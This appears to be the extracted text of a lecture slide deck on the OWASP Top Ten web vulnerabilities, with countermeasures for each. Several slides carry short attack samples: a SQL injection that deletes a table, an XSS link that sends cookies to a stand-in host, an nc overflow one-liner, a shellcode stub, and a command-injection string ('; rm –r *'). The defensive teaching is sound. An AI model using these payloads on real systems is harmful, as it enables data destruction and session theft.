Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
The Ten Most CriticalWeb Application Security
Vulnerabilities
Ryan J.W Chen
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
OWASP Top Ten Vulnerabilities
Outline
A1 Unvalidated Input
A5 Buffer Overflows
A10 Insecure Configuration Management
A2 Broken Access Control
A3 Broken Authentication and Session Management
A4 Cross Site Scripting (XSS) Flaws
A6 Injection Flaws
A7 Improper Error Handling
A8 Insecure Storage
A9 Denial of Service
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
Example Web Application
Browser
Web Server Application Server
Database Server
InternalNetwork
DMZ ProtectedNetwork
Internet
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
Top Ten Vulnerabilities this year & last year
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A1 Unvalidated Input (1/3)
Attacker can tamper with any part of an HTTP request, including url, querystring, headers, cookies, form fields, and hidden field.
Related Attack A4 Cross site Scripting A5 Buffer Overflows A6 Injection Flaws
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A1 Unvalidated Input (2/3)
Any malicious user can see the QueryString and modify it!
http://www.yoursite.com/phones/phonelist.cgi?phoneid=34
http://www.yoursite.com/phones/phonelist.cgi?phoneid=34;delete from phones
SELECT name, phone FROM phones WHEREphoneid=34; DELETE FROM phones
Manipulation
What will be done?
Example: (SQL Injection)
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A1 Unvalidated Input (3/3)
Countermeasures Parameter should be validate before they are used.
Data type Allow character set Minimum and maximum length Whether null is allowed Whether the parameter is require or not Whether duplicates are allowed Numeric range
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A2 Broken Access Control
Access Control = Authorization
Countermeasures Use access control matrix to define access control rules. Administrative function can use VPN to protect.
Path traversal
File permissions – may allow access to config/password files
Client-side caching Insecure session IDs or keys
Forced browsing past access control checks
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A3 Broken Authentication and Session Management
Weak authentication
Countermeasures Strong passwords Account List protection Session ID Protection (SSL)
Password-only
Easily guessable usernamesUnencrypted secrets could be sniffed
Trust relationships between hosts
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A4 Cross Site Scripting (XSS) Flaws
Attacker uses a trust application/company to send malicious code to end-user.
<a href= http://www.insecuresite.com/welcome.asp?name= <FORM action=http://www.badsite.com/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>>here</a> “cookie robbed!!”
Source : Bo
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A5 Buffer Overflows
Mostly affects web/app servers Goal: crash the target app and get a shell
Countermeasures Keep up with bug reports Periodically scan your website Code reviews
–echo “vrfy `perl –e ‘print “a” x 1000’`” |nc echo “vrfy `perl –e ‘print “a” x 1000’`” |nc www.targetsystem.com 25 25
–char shellcode[] = “\xeb\xlf\x5e\x89\x76\x08…”char shellcode[] = “\xeb\xlf\x5e\x89\x76\x08…”
Replace this with something like this…Replace this with something like this…
Example:
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A6 Injection Flaws
Allows attacker to relay malicious code through a web application to another system.
Countermeasures Avoid system calls (use libraries instead) Validate input information. Run with limited privileges
Path traversal: “../”
Add more commands: “; rm –r *”
SQL injection: “’ OR 1=1”
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
Helps attacker know how to target the application.
Countermeasures Code review Modify default error pages (404, 401, etc.)
A7 Improper Error Handling
“File not found” vs. “Access denied”
Example:
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A8 Insecure Storage
Insecure storage of sensitive information.
Countermeasures Use a one-way hash function(SHA-1) instead of storing
encrypted data. Make sure no open vulnerabilities in cryptography.
Improper storage of secrets in memory
Poor randomnessPoor choice of algorithm
Failure to encrypt critical dataInsecure storage of keys, certificates, and passwords
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A9 Denial of Service
Legitimate users can’t be serviced.
Countermeasures Limit the sources allocated to any user to a bare minimum. Avoid any unnecessary access to databases or other expensive
resource.
Exhaust the system resources
Legitimate account lock out
Information Networking Security and Assurance LabNational Chung Cheng University
工業技術研究院電腦與通訊工業研究所Industrial Technology Research InstituteComputer & Communication Research Laboratories
A10 Insecure Configuration Management
Developers ≠ web masters
Countermeasures Configure all security mechanisms. Turn off all unused services. Set up and audit roles, permissions, and accounts. logging and alerts.
Unpatched security flaws in the server software.
Improper file and directory permission.
Default accounts with their default passwords.
Configuration problems:
Top Related